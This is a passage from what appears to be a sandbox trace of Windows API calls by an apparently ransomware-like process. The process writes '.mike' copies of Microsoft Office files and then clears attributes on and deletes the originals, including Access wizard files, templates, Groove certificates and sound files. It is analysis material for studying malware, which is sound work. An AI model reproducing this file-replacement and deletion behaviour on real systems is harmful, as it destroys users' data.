Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.209] SetFilePointer (in: hFile=0x288, lDistanceToMove=1955840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1dd800 [0072.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.211] SetFilePointer (in: hFile=0x288, lDistanceToMove=1966080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e0000 [0072.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0072.213] SetFilePointer (in: hFile=0x288, lDistanceToMove=1976320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e2800 [0072.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.215] SetFilePointer (in: hFile=0x288, lDistanceToMove=1986560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x1e5000 [0072.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.221] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.222] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.224] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.225] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.227] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.228] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.229] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.239] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.246] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0072.248] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0073.219] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE", dwFileAttributes=0x80) returned 1 [0073.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde")) returned 1 [0073.229] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0074.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE.mike", lpFilePart=0x0) returned 0x45 [0074.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE", dwFileAttributes=0x80) returned 1 [0074.998] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwztool.accde")) returned 1 [0075.004] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.004] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.004] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.004] CoTaskMemFree (pv=0x506980) [0075.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.007] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.009] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0075.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML", dwFileAttributes=0x80) returned 1 [0075.015] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.xml")) returned 1 [0075.020] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.020] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.020] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.020] CoTaskMemFree (pv=0x506980) [0075.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.023] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.025] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.026] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.026] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.026] CoTaskMemFree (pv=0x506980) [0075.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.027] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.028] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.028] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.028] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.028] CoTaskMemFree (pv=0x506980) [0075.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.033] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.035] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.036] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.036] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.036] CoTaskMemFree (pv=0x506980) [0075.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.039] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0075.043] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.043] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.043] CoTaskMemFree (pv=0x506980) [0075.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.047] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.047] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.047] CoTaskMemFree (pv=0x506980) [0075.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.057] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.057] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.057] CoTaskMemFree (pv=0x506980) [0075.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.058] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.058] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.058] CoTaskMemFree (pv=0x506980) [0075.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.058] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.058] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.058] CoTaskMemFree (pv=0x506980) [0075.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx", dwFileAttributes=0x80) returned 1 [0075.566] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx")) returned 1 [0075.576] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.576] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.576] CoTaskMemFree (pv=0x506980) [0075.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.577] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.577] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.577] CoTaskMemFree (pv=0x506980) [0075.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.588] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.588] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.588] CoTaskMemFree (pv=0x506980) [0075.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.592] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.592] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.592] CoTaskMemFree (pv=0x506980) [0075.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.594] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.594] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.594] CoTaskMemFree (pv=0x506980) [0075.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.595] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.595] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.595] CoTaskMemFree (pv=0x506980) [0075.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.596] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer", dwFileAttributes=0x80) returned 1 [0075.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer")) returned 1 [0075.604] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.604] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.604] CoTaskMemFree (pv=0x506980) [0075.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer", dwFileAttributes=0x80) returned 1 [0075.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer")) returned 1 [0075.612] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.612] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.612] CoTaskMemFree (pv=0x506980) [0075.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.613] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer", dwFileAttributes=0x80) returned 1 [0075.617] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer")) returned 1 [0075.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.623] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER", dwFileAttributes=0x80) returned 1 [0075.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\RELAY.CER" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\relay.cer")) returned 1 [0075.626] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.626] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.626] CoTaskMemFree (pv=0x506980) [0075.627] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.627] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.627] CoTaskMemFree (pv=0x506980) [0075.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.630] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer", dwFileAttributes=0x80) returned 1 [0075.634] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer")) returned 1 [0075.637] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer", dwFileAttributes=0x80) returned 1 [0075.644] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer")) returned 1 [0075.647] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0075.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer", dwFileAttributes=0x80) returned 1 [0075.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer")) returned 1 [0075.654] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.654] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.654] CoTaskMemFree (pv=0x506980) [0075.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.655] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0075.655] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0075.655] CoTaskMemFree (pv=0x506980) [0075.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0075.659] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV", dwFileAttributes=0x80) returned 1 [0075.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\cough.wav")) returned 1 [0075.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV", dwFileAttributes=0x80) returned 1 [0075.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\giggle.wav")) returned 1 [0075.677] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0075.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HICCUP.WAV", dwFileAttributes=0x80) returned 1 